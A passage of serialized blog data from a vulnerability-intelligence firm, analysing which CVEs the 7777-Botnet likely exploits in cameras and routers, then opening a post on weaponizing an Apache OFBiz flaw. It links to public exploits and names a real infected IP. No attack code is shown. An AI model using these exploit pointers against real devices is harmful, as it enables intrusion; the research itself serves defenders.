Buffer Overflow\",\"Xiongmai URI Buffer Overlow\"],\"hostnames\":[\"1-34-97-9.hinet-ip.hinet.net\"],\"type\":{\"id\":\"initial-access\",\"finding\":\"potentially 
vulnerable\"},\"feed_ids\":[\"876acbdf-ab92-46d7-bfcd-8d11e77baf0c\",\"2025c398-1336-46f7-8ae3-3a0eea75ed61\",\"54dde2a2-54ca-48ce-aa12-8823dc2f82d9\"]}\n",[886,81395,81396,81629],{"__ignoreMap":219},[1373,81397,81398,81400,81402,81404,81406,81408,81410,81413,81415,81417,81419,81421,81423,81425,81428,81430,81432,81434,81436,81438,81440,81442,81444,81446,81448,81450,81452,81455,81457,81459,81461,81463,81465,81467,81469,81472,81474,81476,81478,81480,81482,81484,81486,81489,81491,81493,81495,81497,81499,81501,81503,81506,81508,81510,81512,81514,81516,81518,81520,81523,81525,81527,81529,81531,81533,81536,81538,81540,81542,81545,81547,81550,81552,81554,81556,81558,81560,81562,81564,81567,81569,81571,81573,81575,81577,81579,81581,81583,81585,81587,81589,81591,81593,81595,81597,81599,81601,81603,81605,81607,81609,81611,81613,81615,81617,81619,81621,81624,81626],{"class":1375,"line":1376},[1373,81399,9149],{"class":1383},[1373,81401,183],{"class":9152},[1373,81403,26184],{"class":9155},[1373,81405,183],{"class":9152},[1373,81407,4606],{"class":1383},[1373,81409,183],{"class":9173},[1373,81411,81412],{"class":9176},"1.34.97.9",[1373,81414,183],{"class":9173},[1373,81416,5437],{"class":1383},[1373,81418,183],{"class":9152},[1373,81420,26203],{"class":9155},[1373,81422,183],{"class":9152},[1373,81424,4606],{"class":1383},[1373,81426,81427],{"class":5467},"7777",[1373,81429,5437],{"class":1383},[1373,81431,183],{"class":9152},[1373,81433,26219],{"class":9155},[1373,81435,183],{"class":9152},[1373,81437,4606],{"class":1383},[1373,81439,5971],{"class":7054},[1373,81441,5437],{"class":1383},[1373,81443,183],{"class":9152},[1373,81445,26234],{"class":9155},[1373,81447,183],{"class":9152},[1373,81449,4606],{"class":1383},[1373,81451,183],{"class":9173},[1373,81453,81454],{"class":9176},"2024-01-15T13:08:10.811693",[1373,81456,183],{"class":9173},[1373,81458,5437],{"class":1383},[1373,81460,183],{"class":9152},[1373,81462,26254],{"class":9155},[1373,81464,183],{"class":9152},[1373,81
466,4606],{"class":1383},[1373,81468,183],{"class":9173},[1373,81470,81471],{"class":9176},"AS3462",[1373,81473,183],{"class":9173},[1373,81475,5437],{"class":1383},[1373,81477,183],{"class":9152},[1373,81479,26274],{"class":9155},[1373,81481,183],{"class":9152},[1373,81483,4606],{"class":1383},[1373,81485,183],{"class":9173},[1373,81487,81488],{"class":9176},"Taiwan",[1373,81490,183],{"class":9173},[1373,81492,5437],{"class":1383},[1373,81494,183],{"class":9152},[1373,81496,26293],{"class":9155},[1373,81498,183],{"class":9152},[1373,81500,4606],{"class":1383},[1373,81502,183],{"class":9173},[1373,81504,81505],{"class":9176},"TW",[1373,81507,183],{"class":9173},[1373,81509,5437],{"class":1383},[1373,81511,183],{"class":9152},[1373,81513,26312],{"class":9155},[1373,81515,183],{"class":9152},[1373,81517,4606],{"class":1383},[1373,81519,183],{"class":9173},[1373,81521,81522],{"class":9176},"Hsinchu",[1373,81524,183],{"class":9173},[1373,81526,5437],{"class":1383},[1373,81528,183],{"class":9152},[1373,81530,242],{"class":9155},[1373,81532,183],{"class":9152},[1373,81534,81535],{"class":1383},":[],",[1373,81537,183],{"class":9152},[1373,81539,26345],{"class":9155},[1373,81541,183],{"class":9152},[1373,81543,81544],{"class":1383},":[",[1373,81546,183],{"class":9173},[1373,81548,81549],{"class":9176},"7777Botnet",[1373,81551,183],{"class":9173},[1373,81553,27625],{"class":1383},[1373,81555,183],{"class":9152},[1373,81557,26373],{"class":9155},[1373,81559,183],{"class":9152},[1373,81561,81544],{"class":1383},[1373,81563,183],{"class":9173},[1373,81565,81566],{"class":9176},"1-34-97-9.hinet-ip.hinet.net",[1373,81568,183],{"class":9173},[1373,81570,27625],{"class":1383},[1373,81572,183],{"class":9152},[1373,81574,26399],{"class":9155},[1373,81576,183],{"class":9152},[1373,81578,8304],{"class":1383},[1373,81580,183],{"class":9152},[1373,81582,26412],{"class":9165},[1373,81584,183],{"class":9152},[1373,81586,4606],{"class":1383},[1373,81588,183],{"class":9173},[1373,81590,26421
],{"class":9176},[1373,81592,183],{"class":9173},[1373,81594,5437],{"class":1383},[1373,81596,183],{"class":9152},[1373,81598,26452],{"class":9165},[1373,81600,183],{"class":9152},[1373,81602,4606],{"class":1383},[1373,81604,183],{"class":9173},[1373,81606,26461],{"class":9176},[1373,81608,183],{"class":9173},[1373,81610,5787],{"class":1383},[1373,81612,183],{"class":9152},[1373,81614,26475],{"class":9155},[1373,81616,183],{"class":9152},[1373,81618,81544],{"class":1383},[1373,81620,183],{"class":9173},[1373,81622,81623],{"class":9176},"e738e65a-6e88-4ad3-a922-55d32e57d4e7",[1373,81625,183],{"class":9173},[1373,81627,81628],{"class":1383},"]}\n",[1373,81630,81631,81633,81635,81637,81639,81641,81643,81645,81647,81649,81651,81653,81655,81657,81660,81662,81664,81666,81668,81670,81672,81674,81676,81678,81680,81682,81684,81687,81689,81691,81693,81695,81697,81699,81701,81703,81705,81707,81709,81711,81713,81715,81717,81719,81721,81723,81725,81727,81729,81731,81733,81735,81737,81739,81741,81743,81745,81747,81749,81751,81753,81755,81757,81759,81761,81763,81765,81768,81770,81772,81774,81777,81779,81781,81783,81786,81788,81790,81792,81794,81796,81798,81800,81803,81805,81807,81809,81812,81814,81816,81818,81821,81823,81825,81827,81829,81831,81833,81835,81837,81839,81841,81843,81845,81847,81849,81851,81853,81855,81857,81859,81861,81863,81865,81867,81869,81871,81873,81875,81877,81879,81881,81883,81885,81887,81889,81891,81894,81896,81898,81900,81903,81905,81907,81909,81912,81914],{"class":1375,"line":220},[1373,81632,9149],{"class":1383},[1373,81634,183],{"class":9152},[1373,81636,26184],{"class":9155},[1373,81638,183],{"class":9152},[1373,81640,4606],{"class":1383},[1373,81642,183],{"class":9173},[1373,81644,81412],{"class":9176},[1373,81646,183],{"class":9173},[1373,81648,5437],{"class":1383},[1373,81650,183],{"class":9152},[1373,81652,26203],{"class":9155},[1373,81654,183],{"class":9152},[1373,81656,4606],{"class":1383},[1373,81658,81659],{"class":5467},"81",[1373,81661,5437],{"
class":1383},[1373,81663,183],{"class":9152},[1373,81665,26219],{"class":9155},[1373,81667,183],{"class":9152},[1373,81669,4606],{"class":1383},[1373,81671,5971],{"class":7054},[1373,81673,5437],{"class":1383},[1373,81675,183],{"class":9152},[1373,81677,26234],{"class":9155},[1373,81679,183],{"class":9152},[1373,81681,4606],{"class":1383},[1373,81683,183],{"class":9173},[1373,81685,81686],{"class":9176},"2024-01-14T15:33:16.045105",[1373,81688,183],{"class":9173},[1373,81690,5437],{"class":1383},[1373,81692,183],{"class":9152},[1373,81694,26254],{"class":9155},[1373,81696,183],{"class":9152},[1373,81698,4606],{"class":1383},[1373,81700,183],{"class":9173},[1373,81702,81471],{"class":9176},[1373,81704,183],{"class":9173},[1373,81706,5437],{"class":1383},[1373,81708,183],{"class":9152},[1373,81710,26274],{"class":9155},[1373,81712,183],{"class":9152},[1373,81714,4606],{"class":1383},[1373,81716,183],{"class":9173},[1373,81718,81488],{"class":9176},[1373,81720,183],{"class":9173},[1373,81722,5437],{"class":1383},[1373,81724,183],{"class":9152},[1373,81726,26293],{"class":9155},[1373,81728,183],{"class":9152},[1373,81730,4606],{"class":1383},[1373,81732,183],{"class":9173},[1373,81734,81505],{"class":9176},[1373,81736,183],{"class":9173},[1373,81738,5437],{"class":1383},[1373,81740,183],{"class":9152},[1373,81742,26312],{"class":9155},[1373,81744,183],{"class":9152},[1373,81746,4606],{"class":1383},[1373,81748,183],{"class":9173},[1373,81750,81522],{"class":9176},[1373,81752,183],{"class":9173},[1373,81754,5437],{"class":1383},[1373,81756,183],{"class":9152},[1373,81758,242],{"class":9155},[1373,81760,183],{"class":9152},[1373,81762,81544],{"class":1383},[1373,81764,183],{"class":9173},[1373,81766,81767],{"class":9176},"CVE-2017-7577",[1373,81769,183],{"class":9173},[1373,81771,5437],{"class":1383},[1373,81773,183],{"class":9173},[1373,81775,81776],{"class":9176},"CVE-2018-10088",[1373,81778,183],{"class":9173},[1373,81780,5437],{"class":1383},[1373,81782,183],{"class":
9173},[1373,81784,81785],{"class":9176},"CVE-2022-45460",[1373,81787,183],{"class":9173},[1373,81789,27625],{"class":1383},[1373,81791,183],{"class":9152},[1373,81793,26345],{"class":9155},[1373,81795,183],{"class":9152},[1373,81797,81544],{"class":1383},[1373,81799,183],{"class":9173},[1373,81801,81802],{"class":9176},"Xiongmai Path Traversal Credential Leak",[1373,81804,183],{"class":9173},[1373,81806,5437],{"class":1383},[1373,81808,183],{"class":9173},[1373,81810,81811],{"class":9176},"Xiongmai Authentication Buffer Overflow",[1373,81813,183],{"class":9173},[1373,81815,5437],{"class":1383},[1373,81817,183],{"class":9173},[1373,81819,81820],{"class":9176},"Xiongmai URI Buffer Overlow",[1373,81822,183],{"class":9173},[1373,81824,27625],{"class":1383},[1373,81826,183],{"class":9152},[1373,81828,26373],{"class":9155},[1373,81830,183],{"class":9152},[1373,81832,81544],{"class":1383},[1373,81834,183],{"class":9173},[1373,81836,81566],{"class":9176},[1373,81838,183],{"class":9173},[1373,81840,27625],{"class":1383},[1373,81842,183],{"class":9152},[1373,81844,26399],{"class":9155},[1373,81846,183],{"class":9152},[1373,81848,8304],{"class":1383},[1373,81850,183],{"class":9152},[1373,81852,26412],{"class":9165},[1373,81854,183],{"class":9152},[1373,81856,4606],{"class":1383},[1373,81858,183],{"class":9173},[1373,81860,1281],{"class":9176},[1373,81862,183],{"class":9173},[1373,81864,5437],{"class":1383},[1373,81866,183],{"class":9152},[1373,81868,26452],{"class":9165},[1373,81870,183],{"class":9152},[1373,81872,4606],{"class":1383},[1373,81874,183],{"class":9173},[1373,81876,10300],{"class":9176},[1373,81878,183],{"class":9173},[1373,81880,5787],{"class":1383},[1373,81882,183],{"class":9152},[1373,81884,26475],{"class":9155},[1373,81886,183],{"class":9152},[1373,81888,81544],{"class":1383},[1373,81890,183],{"class":9173},[1373,81892,81893],{"class":9176},"876acbdf-ab92-46d7-bfcd-8d11e77baf0c",[1373,81895,183],{"class":9173},[1373,81897,5437],{"class":1383},[1373,81899,183],
{"class":9173},[1373,81901,81902],{"class":9176},"2025c398-1336-46f7-8ae3-3a0eea75ed61",[1373,81904,183],{"class":9173},[1373,81906,5437],{"class":1383},[1373,81908,183],{"class":9173},[1373,81910,81911],{"class":9176},"54dde2a2-54ca-48ce-aa12-8823dc2f82d9",[1373,81913,183],{"class":9173},[1373,81915,81628],{"class":1383},[18,81917,81918,81919,4606],{},"For those less inclined to look at JSON, you can also observe the installation on ",[47,81920,41731],{"href":81921,"rel":81922},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F1.34.97.9",[51],[18,81924,81925],{},[68,81926],{":width":10862,"alt":81927,"src":81928},"Xiongmai colocated with 7777-Botnet","\u002Fblog\u002Fip-intel-7777-botnet\u002Fxiongmai-co-located.png",[18,81930,81931,81932,1246,81937,81941,81942,81946,81947,1246,81952,1255,81957,81961],{},"As we can see, the botnet is co-located with a Xiongmai NVR\u002FIP camera’s HTTP server. In our IP intelligence JSON, we are able to correlate three known vulnerabilities this server is affected by: CVE-2017-7577, CVE-2018-10088, and CVE-2022-45460. All of these are well-known vulnerabilities with public exploits found in ",[47,81933,81936],{"href":81934,"rel":81935},"https:\u002F\u002Fraw.githubusercontent.com\u002Fthreat9\u002Froutersploit\u002Fmaster\u002Froutersploit\u002Fmodules\u002Fexploits\u002Fcameras\u002Fxiongmai\u002Fuc_httpd_path_traversal.py",[51],"Routersploit",[47,81938,2692],{"href":81939,"rel":81940},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F44864",[51],", and on ",[47,81943,2485],{"href":81944,"rel":81945},"https:\u002F\u002Fgithub.com\u002Ftothi\u002Fpwn-hisilicon-dvr\u002Fblob\u002Fmaster\u002Fpwn_hisilicon_dvr.py",[51],". 
CVE-2018-10088, in particular, is already associated with the ",[47,81948,81951],{"href":81949,"rel":81950},"https:\u002F\u002Fblog.netlab.360.com\u002Fbotnets-never-die-satori-refuses-to-fade-away-en\u002F",[51],"Satori",[47,81953,81956],{"href":81954,"rel":81955},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fthe-ghosts-of-mirai",[51],"Hajime",[47,81958,24615],{"href":81959,"rel":81960},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Fatt-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits",[51]," botnets.",[18,81963,81964,81965,81972,81973,81978],{},"As we detailed in our November 2022 blog, ",[1131,81966,81967],{},[47,81968,81971],{"href":81969,"rel":81970},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fxiongmai-iot-exploitation",[51],"Xiongmai IoT Exploitation",", the volume of devices vulnerable to these CVEs is still reasonably high. And while new Xiongmai vulnerabilities have popped up in recent years (e.g. ",[47,81974,81977],{"href":81975,"rel":81976},"https:\u002F\u002Fblog.ret2.me\u002Fpost\u002F2022-01-26-exploiting-xiongmai-dvrs\u002F",[51],"CVE-2022-26259","), the exposed interfaces and the lower volume of Xiongmai devices exploited by 7777-Botnet suggest that older vulnerabilities are being used. As such, it’s entirely reasonable to assume that 7777-Botnet is leveraging one (if not all) of CVE-2017-7577, CVE-2018-10088, and CVE-2022-45460. This isn’t a fact, but a reasonable guess based on the information in front of us.",[993,81980,81982],{"id":81981},"hikvision-infections","Hikvision Infections",[18,81984,81985,81986,81990],{},"A similar pattern we see in our IP intelligence data is 7777-Botnet co-located with Hikvision cameras (and OEM derivatives). The botnet is likely using ",[47,81987,37587],{"href":81988,"rel":81989},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-36260",[51]," to infect these targets. 
This idea is bolstered by the fact that a majority of infected cameras are still using affected versions:",[18,81992,81993],{},[68,81994],{":width":10862,"alt":81995,"src":81996},"Hikvision colocated with 7777-Botnet","\u002Fblog\u002Fip-intel-7777-botnet\u002Fhikvision-co-located.png",[18,81998,81999,82000,82004,82005,82009,82010,82017,82018,982,82022,82026,82027,982,82031,82035],{},"CVE-2021-36260 is a very well-known vulnerability. VulnCheck tracks 23 public exploits for this vulnerability, including a ",[47,82001,32281],{"href":82002,"rel":82003},"https:\u002F\u002Fraw.githubusercontent.com\u002Frapid7\u002Fmetasploit-framework\u002Fmaster\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Fhikvision_cve_2021_36260_blind.rb",[51],". The vulnerability is included in CISA’s Known Exploited Vulnerabilities Catalog (KEV), ",[47,82006,82007],{"href":82007,"rel":82008},"https:\u002F\u002Fwww.cisa.gov\u002Fknown-exploited-vulnerabilities-catalog",[51],", and CISA included it in their ",[1131,82011,82012],{},[47,82013,82016],{"href":82014,"rel":82015},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fcybersecurity-advisories\u002Faa22-279a",[51],"“Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors”"," list.\nCVE-2021-36260 is already associated with botnets ",[47,82019,24620],{"href":82020,"rel":82021},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fzerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities",[51],[47,82023,24605],{"href":82024,"rel":82025},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fmirai-based-botnet-moobot-targets-hikvision-vulnerability",[51],". Finally, CVE-2021-36260 is actively detected in the 
",[47,82028,31654],{"href":82029,"rel":82030},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmap\u002F?day=2024-01-16&host_type=src&vulnerability=cve-2021-36260",[51],[47,82032,11029],{"href":82033,"rel":82034},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fhikvision-ip-camera-rce-attempt?days=30",[51]," honeypot networks.",[18,82037,82038],{},[68,82039],{":width":10862,"alt":82040,"src":82041},"Greynoise tag for CVE-2021-36260","\u002Fblog\u002Fip-intel-7777-botnet\u002Fgreynoise-cve-2021-36260.png",[18,82043,82044],{},"Given all that background, it again seems reasonable to theorize that the botnet is spreading to Hikvision cameras using CVE-2021-36260. Even as the vulnerability ages, thousands of vulnerable targets remain, and their number appears to correlate directly with the botnet’s infection rate.",[993,82046,82048],{"id":82047},"tp-link-infections","TP-Link Infections",[18,82050,82051,82052,1246,82057,1246,82062,1246,82067,1246,82072,82077],{},"Another set of targets the botnet seems to go after are TP-Link routers. 
We observe the botnet co-hosted with the web interface for the following models: ",[47,82053,82056],{"href":82054,"rel":82055},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr740n\u002F#Firmware",[51],"WR740N",[47,82058,82061],{"href":82059,"rel":82060},"https:\u002F\u002Fwww.tp-link.com\u002Fin\u002Fsupport\u002Fdownload\u002Ftl-wr840n\u002F#Firmware",[51],"WR840N",[47,82063,82066],{"href":82064,"rel":82065},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr841n\u002F#Firmware",[51],"WR841N",[47,82068,82071],{"href":82069,"rel":82070},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr940n\u002F#Firmware",[51],"WR940N",[47,82073,82076],{"href":82074,"rel":82075},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Fdownload\u002Ftl-wr941nd\u002F#Firmware",[51],"WR941ND",", and a much smaller subset of Archer infections.",[18,82079,82080],{},[68,82081],{":width":10862,"alt":82082,"src":82083},"TP-Link colocated with 7777-Botnet","\u002Fblog\u002Fip-intel-7777-botnet\u002Ftp-link-co-located.png",[18,82085,82086],{},"The infected routers are all older, having not received any updates since 2022 (and one not receiving an update since 2019). It’s difficult to pin a single vulnerability on this group because TP-Link either creates CVEs with useless descriptions or doesn’t create any at all. Their release notes hardly shed light on the situation either.",[18,82088,82089],{},[68,82090],{":width":10862,"alt":82091,"src":82092},"Useless release notes","\u002Fblog\u002Fip-intel-7777-botnet\u002Ftp-link-release-notes.png",[18,82094,82095,82096,82101,82102,982,82106,59],{},"However, ",[47,82097,82100],{"href":82098,"rel":82099},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-24355",[51],"CVE-2022-24355"," seems a reasonable candidate. 
It doesn’t require authentication, and public exploits have been developed for the ",[47,82103,82071],{"href":82104,"rel":82105},"https:\u002F\u002Fblog.viettelcybersecurity.com\u002Ftp-link-tl-wr940n-httpd-httprpmfs-stack-based-buffer-overflow-remote-code-execution-vulnerability\u002F",[51],[47,82107,82066],{"href":82108,"rel":82109},"https:\u002F\u002Fblog.viettelcybersecurity.com\u002F1day-to-0day-on-tl-link-tl-wr841n\u002F",[51],[18,82111,82112,82113,82118],{},"There are more well-known TP-Link vulnerabilities that affect these models, such as ",[47,82114,82117],{"href":82115,"rel":82116},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2021-41653",[51],"CVE-2021-41653",". But these exploits seem to require valid credentials to exploit the target. It is certainly a possibility that there are routers using default credentials or that 7777-botnet is brute-forcing credentials, but there is no evidence to support that. As such, CVE-2022-24355 seems like the most straightforward possibility - although it is little more than an educated guess.",[993,82120,82122],{"id":82121},"other-infections-and-socks5","Other Infections and SOCKS5",[18,82124,82125],{},"We also see the 7777-Botnet on systems without TP-Link, Xiongmai, or Hikvision present, although at a significantly lower volume (which might indicate these are just honeypots, it’s hard to say). We see the botnet co-located with MVPower (CVE-2016-20016), Zyxel NAS (CVE-2020-9054), and GitLab (CVE-2021-22205).",[18,82127,82128],{},"We also observed that the botnet often spins up a SOCKS5 server on port 11288. We uncovered this, again, by monitoring co-located services. 
Shodan doesn’t capture this behavior, but our friends over at Censys can visualize it for us.",[18,82130,82131],{},[68,82132],{":width":10862,"alt":82133,"src":82134},"7777-Botnet Socks5 on Censys","\u002Fblog\u002Fip-intel-7777-botnet\u002Fcensys-socks5.png",[18,82136,82137],{},"This is an interesting feature of the botnet that was not described in the original writeup and indicates it might have a larger role in the attacker’s infrastructure.",[61,82139,1903],{"id":1902},[18,82141,82142],{},"The 7777-Botnet is an active botnet, and speculating how it spreads to new systems helps researchers begin to understand how to dismantle the botnet and also provides defenders with actionable steps to defend against infection. Using known vulnerabilities on co-located services, we hypothesize five different CVEs that the botnet might be using to spread to TP-Link, Xiongmai, and Hikvision devices, and we suggest a few CVEs for the lower-volume infections.",[18,82144,82145],{},"While the botnet isn’t well-known, it is easy enough to protect your networks from it.\nIsolate infected hosts, remediate the potentially exploited CVEs, and validate that no additional infected devices exist in your network. Further, be sure to inventory devices for unnecessary internet exposure, and place them behind appropriate security controls.",[61,82147,82149],{"id":82148},"about-vulncheck-and-ip-intelligence","About VulnCheck and IP Intelligence",[18,82151,82152],{},"This analysis comes out of VulnCheck's IP Intelligence capability, which is now generally available in our Initial Access Intelligence product. 
Sign up to trial our data by using the Register and Schedule Demo buttons at the top right corner of our website.",[2901,82154,82155],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: 
var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":82157},[82158,82159,82164,82165],{"id":11647,"depth":220,"text":11648},{"id":81386,"depth":220,"text":81387,"children":82160},[82161,82162,82163],{"id":81981,"depth":1266,"text":81982},{"id":82047,"depth":1266,"text":82048},{"id":82121,"depth":1266,"text":82122},{"id":1902,"depth":220,"text":1903},{"id":82148,"depth":220,"text":82149},"2024-01-18","VulnCheck recently announced an IP Intelligence product that tracks attacker command & control (C2) infrastructure, as well 
as internet-facing potentially vulnerable systems. Using this data, we’ll explore the vulnerabilities that the 7777-Botnet is likely using to infect new hosts.",{"slug":82169},"ip-intel-7777-botnet","\u002Fblog\u002Fip-intel-7777-botnet",{"title":58279,"description":82167},"blog\u002Fip-intel-7777-botnet",[23275],"x4VlkZDllklyMNN3aRjQwXX2hD4GPhWxV4jiGwz7RDc",{"id":82176,"title":58272,"articles":82177,"authors":82189,"body":82191,"date":82181,"description":83369,"extension":234,"image":7,"link":7,"meta":83370,"navigation":237,"path":83372,"seo":83373,"series":7,"stem":83374,"subtype":7,"tags":83375,"__hash__":83376},"blog\u002Fblog\u002Fofbiz-cve-2023-51467.md",[82178,82182,82186],{"title":82179,"source":14382,"link":82180,"date":82181},"New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems","https:\u002F\u002Fthehackernews.com\u002F2024\u002F01\u002Fnew-poc-exploit-for-apache-ofbiz.html","2024-01-11",{"title":82183,"source":61436,"link":82184,"date":82185},"Risky Biz News: Chinese APT exploits two Pulse Secure zero-days","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fchinese-apt-exploits-pulse-secure-zero-days?utm_source=post-email-title&publication_id=852612&post_id=140591138&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email","2024-01-12",{"title":82187,"source":14390,"link":82188,"date":82185},"Researchers published a proof-of-concept (PoC) code for the recently disclosed critical flaw CVE-2023-51467 in the Apache 
OfBiz.","https:\u002F\u002Fsecurityaffairs.com\u002F157339\u002Fhacking\u002Fapache-ofbiz-poc-exploit.html",[82190],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":82192,"toc":83359},[82193,82196,82198,82217,82221,82224,82230,82233,82239,82267,82271,82291,82297,82316,82320,82331,82337,82357,82366,82413,82416,82458,82461,82465,82509,82516,82552,82566,82626,82635,82639,82659,82670,82673,82813,82821,82834,82987,82990,83294,83300,83306,83309,83312,83318,83321,83323,83334,83336,83356],[263,82194],{":list":82195,"ico":266,"title":58272},"[\"VulnCheck developed and open-sourced a memory-resident payload for Apache OFBiz’s CVE-2023-51467.\",\"The Apache OFBiz Groovy “Sandbox” is trivially bypassable.\",\"There are only hundreds of vulnerable internet-facing Apache OFBiz installations.\"]",[61,82197,11648],{"id":11647},[18,82199,82200,82201,82206,82207,82212,82213,82216],{},"On December 26, ",[47,82202,82205],{"href":82203,"rel":82204},"https:\u002F\u002Fblog.sonicwall.com\u002Fen-us\u002F2023\u002F12\u002Fsonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz\u002F",[51],"SonicWall"," disclosed an authentication bypass affecting Apache OFBiz. SonicWall demonstrated the vulnerability, assigned ",[47,82208,82211],{"href":82209,"rel":82210},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-51467",[51],"CVE-2023-51467",", by accessing the protected HTTP endpoint ",[886,82214,82215],{},"\u002Fwebtools\u002Fcontrol\u002Fping"," without authentication. While that proved the vulnerability existed, it did not demonstrate arbitrary code execution. However, CVE-2023-51467 can be used to execute arbitrary code. And even better, it can be used to execute a payload from memory. In this blog, we’ll demonstrate how we weaponized Apache OFBiz CVE-2023-51467.",[61,82218,82220],{"id":82219},"does-ofbiz-matter","Does OFBiz Matter?",[18,82222,82223],{},"Apache OFBiz is not hugely popular software. 
There are approximately 500-1000 internet-facing targets at any given time. A naive search on Shodan indicates there are more than 10,000 targets.",[18,82225,82226],{},[68,82227],{":width":10862,"alt":82228,"src":82229},"OFBiz on Shodan","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fshodan-honeypots.png",[18,82231,82232],{},"But it turns out that almost all of these are honeypots. In fact, looking at Shodan’s trends, we see a huge spike of honeypots in September 2023.",[18,82234,82235],{},[68,82236],{":width":10862,"alt":82237,"src":82238},"OFBiz honeypot trend on Shodan","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fshodan-ofbiz-trend.png",[18,82240,82241,82242,82246,82247,1255,82252,82257,82258,82262,82263,59],{},"This suggests that the software is interesting to defenders and attackers alike. Historically, OFBiz has been an exploitation target. The Sysrv botnet was ",[47,82243,31277],{"href":82244,"rel":82245},"https:\u002F\u002Fcujo.com\u002Fblog\u002Fthe-sysrv-botnet-and-how-it-evolved\u002F",[51]," to exploit 